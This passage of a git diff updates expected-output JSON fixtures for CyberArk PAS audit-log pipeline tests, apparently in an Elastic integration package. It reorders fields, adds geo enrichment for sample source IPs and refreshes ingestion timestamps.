Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "130", "kind": "event", 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json index aa9a17269aa..8c6f26df32a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "127.0.0.1" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", 
@@ -46,15 +39,22 @@ "host": { "name": "VAULT" }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:37.727184900Z", + "ingested": "2021-12-14T14:42:01.264305950Z", "original": "\u003c7\u003e1 2021-03-11T18:45:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:45:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:45:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e178\u003c/MessageID\u003e\\n \u003cDesc\u003eGet User's Details\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eGet User's Details\u003c/Action\u003e\\n \u003cSourceUser\u003eMaster\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGet User's Details\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:45:23\",\"IsoTimestamp\":\"2021-03-11T18:45:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"178\",\"Desc\":\"Get User's 
Details\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Get User's Details\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Get User's Details\",\"GatewayStation\":\"\"}}}", "code": "178", "kind": "event", "action": "get user's details", "type": "error" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json index e19f27f504a..35228e8266b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -50,7 +59,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830911800Z", + "ingested": "2021-12-14T14:42:01.371001617Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -77,6 +86,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -120,7 +138,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830920400Z", + "ingested": "2021-12-14T14:42:01.371004151Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -147,6 +165,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -190,7 +217,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830924200Z", + "ingested": "2021-12-14T14:42:01.371004548Z", "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -217,6 +244,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -260,7 +296,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830928700Z", + "ingested": "2021-12-14T14:42:01.371004960Z", "original": "\u003c5\u003e1 2021-03-10T17:59:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:19\",\"IsoTimestamp\":\"2021-03-10T17:59:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -287,6 +323,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -330,7 +375,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830933200Z", + "ingested": "2021-12-14T14:42:01.371005305Z", "original": "\u003c5\u003e1 2021-03-10T17:59:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:27\",\"IsoTimestamp\":\"2021-03-10T17:59:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", 
@@ -357,6 +402,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -400,7 +454,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830937800Z", + "ingested": "2021-12-14T14:42:01.371005639Z", "original": "\u003c5\u003e1 2021-03-10T22:19:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:06\",\"IsoTimestamp\":\"2021-03-10T22:19:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMApp_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -427,6 +481,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -470,7 +533,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830943200Z", + "ingested": "2021-12-14T14:42:01.371005985Z", "original": "\u003c5\u003e1 2021-03-10T22:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:15\",\"IsoTimestamp\":\"2021-03-10T22:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMGw_ASR-WIN\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -497,6 +560,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -541,7 +613,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830948700Z", + "ingested": "2021-12-14T14:42:01.371006322Z", "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -568,6 +640,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -612,7 +693,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830954Z", + "ingested": "2021-12-14T14:42:01.371006655Z", "original": "\u003c5\u003e1 2021-03-11T16:59:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:36\",\"IsoTimestamp\":\"2021-03-11T16:59:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -639,6 +720,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -683,7 +773,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830959500Z", + "ingested": "2021-12-14T14:42:01.371006990Z", "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -710,6 +800,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -754,7 +853,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830964900Z", + "ingested": "2021-12-14T14:42:01.371007322Z", "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPApp_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", @@ -781,6 +880,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -825,7 +933,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:37.830970700Z", + "ingested": "2021-12-14T14:42:01.371007843Z", "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json index 42dd5c423c0..9e986e8398b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - 